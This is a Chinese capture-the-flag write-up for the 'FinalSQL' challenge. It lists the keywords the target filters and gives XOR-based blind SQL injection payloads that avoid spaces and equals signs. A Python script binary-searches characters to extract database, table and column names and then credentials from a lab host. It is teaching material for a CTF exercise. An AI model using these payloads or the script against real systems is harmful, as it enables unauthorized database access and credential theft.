[极客大挑战 2019]FinalSQL
通过?id=xxxx
可以测试过滤情况、使用burpsuit的爆破模块爆破过滤情况。
过滤了等号
、if
、union
、#
、空格
、*
、=
等等
未过滤select
、^
、单引号
、regexp
、ascii
、substr
、、regexp
、from
、where
等等
测试payload为:
?id=1^(ascii(substr(database(),1,1))>128)
附上脚本
import requests
import time
url="http://034e464a-0894-4c26-b4a8-c0932264dc6f.node3.buuoj.cn/search.php"
flag=""
for i in range(10,127):
print(i,":")
low=32
high=128
mid=(low+high)//2
while low<=high:
print(mid)
#payload="?id=1^(ascii(substr(database(),{0},1))>{1})".format(i, mid) #数据库名,geek
#payload="?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{0},1))>{1})".format(i, mid)#所有的数据库
#information_schema,mysql,performance_schema,test,geek
#payload="?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where((table_schema)regexp('geek'))),{0},1))>{1})".format(i, mid)#表名
#geek:F1naI1y,Flaaaaag
#payload="?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where((table_name)regexp('F1naI1y'))),{0},1))>{1})".format(i, mid)#字段名
#Flaaaaag:id,fl4gawsl.提示语句
#F1naI1y:id,username,password
payload="?id=1^(ascii(substr((select(password)from(F1naI1y)where((username)regexp('flag'))),{0},1))>{1})".format(i, mid)
#username:mygod,welcome,site,site,site,site,Syc,finally,flag
#flag:
t = requests.get(url+payload)
#print(t.text)
if "NO! Not this! Click others~~~" in t.text:
high = mid-1
mid=(low+high)//2
else:
low=mid+1
mid=(low+high)//2
flag+=chr(high+1)
print(flag)
time.sleep(1)
相似题目POST注入https://blog.csdn.net/yao_xin_de_yuan/article/details/108306162